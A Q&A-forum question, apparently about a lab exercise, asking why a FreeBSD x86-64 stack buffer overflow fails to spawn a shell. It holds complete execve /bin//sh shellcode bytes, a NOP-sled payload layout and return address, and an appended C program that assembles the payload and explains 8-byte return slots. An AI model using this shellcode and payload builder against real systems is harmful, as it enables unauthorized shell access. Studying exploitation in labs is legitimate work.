2 years ago

#59952

aika

Buffer overflow, pointing to the proper address but still not working

So I am trying to implement a buffer overflow to get shell access to a buggy machine.

The machine is

  • FreeBSD
  • little-endian byte order
  • String length is 200, which causes the overflow.

Now, after consulting http://shell-storm.org/shellcode/files/shellcode-106.php to get a shellcode for /bin/sh and modifying the string, this is what I made:

NOPs: "\x90"x164

Shellcode: "\x48\x31\xc0\x99\xb0\x3b\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x48\x89\xe7\x57\x52\x48\x89\xe6\x0f\x05"

Address to jump to: "\x68\xea\xff\xff\xff\x7f"   # 0x7fffffffea68 is in the middle of the NOPs.

The problem is, I can get my EIP to point to 0x7fffffffea68 exactly. However, when the segmentation fault occurs, the address shows up as 0x00007fffffffae68. How do I navigate to the address 0x7fffffffea68 as it shows up without the 4 zeros when I look at the registers from the stack pointer? The address is correct but I cannot jump there as it is "incorrect".

This is how the address shows up during the segmentation fault (ignore ea/ae here; the problem is the same both ways): [screenshot: how it appears on segmentation fault]

Here is the output of info registers: [screenshot: the instruction pointer address]

Here is how it appears in the dump (to show the intended address): [screenshot: stack pointer region, giving the address to jump to]

I do not understand where I am going wrong with this. The likely answer is the address to jump to, so I tried making various changes to the lengths and where to jump to. It still does not work.

The second possibility could be the shellcode, but I put my money on the length. I need help to understand where I might be wrong and how I can go about mitigating this problem. Thanks.

Tags: c, assembly, x86-64, buffer-overflow, exploit
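The following is an added example for the layout question above; it is not the poster's code and it cannot reproduce the crash, since the screenshots are not on the page. It assumes the values the question gives (a 164-byte NOP sled, the 31-byte shell-storm shellcode-106, the hypothetical target address 0x7fffffffea68) plus one fact the question does not state: on x86-64 the saved return address is an 8-byte slot, so 0x7fffffffea68 and 0x00007fffffffea68 are the same value and the "4 zeros" are the upper 16 bits, which must be zero for the address to be canonical. The code decodes a "\xNN" string the way a perl/python one-liner would (so a dropped backslash shows up as a changed byte count), builds sled + shellcode + address, and reports what would land in RIP when only 6 of the 8 address bytes are written. All function and constant names are hypothetical.

```c
/* Added example, not code from the question: a payload-layout checker for the
 * sled + shellcode + return-address string described above.  Assumptions: a
 * 164-byte NOP sled, the 31-byte shell-storm shellcode-106, an 8-byte saved-RIP
 * slot (x86-64) and the hypothetical target 0x7fffffffea68. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NOP_COUNT 164
#define RET_SLOT  8          /* saved RIP on x86-64 is 8 bytes, not 4 */

/* shell-storm shellcode-106 (FreeBSD x86-64 execve /bin//sh), spelled the way
 * a perl/python one-liner sees it: "\xNN" escapes. */
const char SHELLCODE_ESC[] =
    "\\x48\\x31\\xc0\\x99\\xb0\\x3b\\x48\\xbf\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68"
    "\\x48\\xc1\\xef\\x08\\x57\\x48\\x89\\xe7\\x57\\x52\\x48\\x89\\xe6\\x0f\\x05";
/* Constructed variant with one backslash dropped ("\x08x57") to show how a
 * transcription slip changes the decoded length. */
const char SHELLCODE_TYPO[] =
    "\\x48\\x31\\xc0\\x99\\xb0\\x3b\\x48\\xbf\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68"
    "\\x48\\xc1\\xef\\x08x57\\x48\\x89\\xe7\\x57\\x52\\x48\\x89\\xe6\\x0f\\x05";

static int hexval(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode "\xNN" escapes into bytes; anything that is not a complete escape is
 * copied literally, exactly as the interpreter would do it. */
size_t unescape_hex(const char *s, uint8_t *out, size_t cap) {
    size_t n = 0;
    while (*s && n < cap) {
        if (s[0] == '\\' && s[1] == 'x' && hexval(s[2]) >= 0 && hexval(s[3]) >= 0) {
            out[n++] = (uint8_t)(hexval(s[2]) * 16 + hexval(s[3]));
            s += 4;
        } else {
            out[n++] = (uint8_t)*s++;
        }
    }
    return n;
}

size_t decoded_len(const char *s) {
    uint8_t b[512];
    return unescape_hex(s, b, sizeof b);
}

/* i-th decoded byte, or -1 past the end. */
int decoded_byte_at(const char *s, size_t i) {
    uint8_t b[512];
    size_t n = unescape_hex(s, b, sizeof b);
    return i < n ? b[i] : -1;
}

/* The saved-RIP slot is read as 8 little-endian bytes: 0x7fffffffea68 and
 * 0x00007fffffffea68 are the same value; the "4 zeros" are the top 16 bits. */
uint64_t rip_from_slot(const uint8_t *slot) {
    uint64_t v = 0;
    for (int i = RET_SLOT - 1; i >= 0; i--) v = (v << 8) | slot[i];
    return v;
}

/* User-space x86-64 addresses are canonical with bits 63..47 clear; a
 * non-canonical RIP faults before any byte at that address is fetched. */
int is_canonical_user(uint64_t addr) { return (addr >> 47) == 0; }

/* What RIP becomes if only `nbytes` of the address are written and the rest
 * of the slot still holds `filler` (whatever was there before the copy). */
uint64_t rip_from_short_address(uint64_t addr, size_t nbytes, uint8_t filler) {
    uint8_t slot[RET_SLOT];
    memset(slot, filler, sizeof slot);
    for (size_t i = 0; i < nbytes && i < RET_SLOT; i++)
        slot[i] = (uint8_t)(addr >> (8 * i));
    return rip_from_slot(slot);
}

/* sled + shellcode + full 8-byte little-endian address; 0 if it does not fit. */
size_t build_payload(uint8_t *buf, size_t cap, size_t nops,
                     const uint8_t *sc, size_t sclen, uint64_t ret) {
    size_t total = nops + sclen + RET_SLOT;
    if (total > cap) return 0;
    memset(buf, 0x90, nops);
    memcpy(buf + nops, sc, sclen);
    for (size_t i = 0; i < RET_SLOT; i++)
        buf[nops + sclen + i] = (uint8_t)(ret >> (8 * i));
    return total;
}

/* Decode the escape string, build the payload and return the RIP it would
 * install, or 0 if the payload does not fit in `cap` bytes. */
uint64_t payload_rip(const char *esc, size_t nops, size_t cap, uint64_t ret) {
    uint8_t sc[512], buf[512];
    size_t sclen = unescape_hex(esc, sc, sizeof sc);
    size_t total = build_payload(buf, cap < sizeof buf ? cap : sizeof buf,
                                 nops, sc, sclen, ret);
    return total ? rip_from_slot(buf + total - RET_SLOT) : 0;
}

int main(void) {
    uint64_t target = 0x7fffffffea68ULL;
    printf("shellcode decodes to %zu bytes (typo variant: %zu)\n",
           decoded_len(SHELLCODE_ESC), decoded_len(SHELLCODE_TYPO));
    printf("sled + shellcode + 8-byte ret = %zu bytes\n",
           (size_t)NOP_COUNT + decoded_len(SHELLCODE_ESC) + RET_SLOT);
    printf("RIP with 8-byte address: 0x%016llx\n",
           (unsigned long long)payload_rip(SHELLCODE_ESC, NOP_COUNT, 512, target));
    printf("RIP with 6 bytes + 0x41 filler: 0x%016llx (canonical=%d)\n",
           (unsigned long long)rip_from_short_address(target, 6, 0x41),
           is_canonical_user(rip_from_short_address(target, 6, 0x41)));
    return 0;
}
```

The two checks worth keeping from this: compare `decoded_len()` of the exact string you feed the interpreter against the byte count the shellcode page states, and look at all 8 bytes of the return slot in the debugger rather than the 6 you wrote, since whatever follows them is what the CPU combines into RIP.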

0 Answers
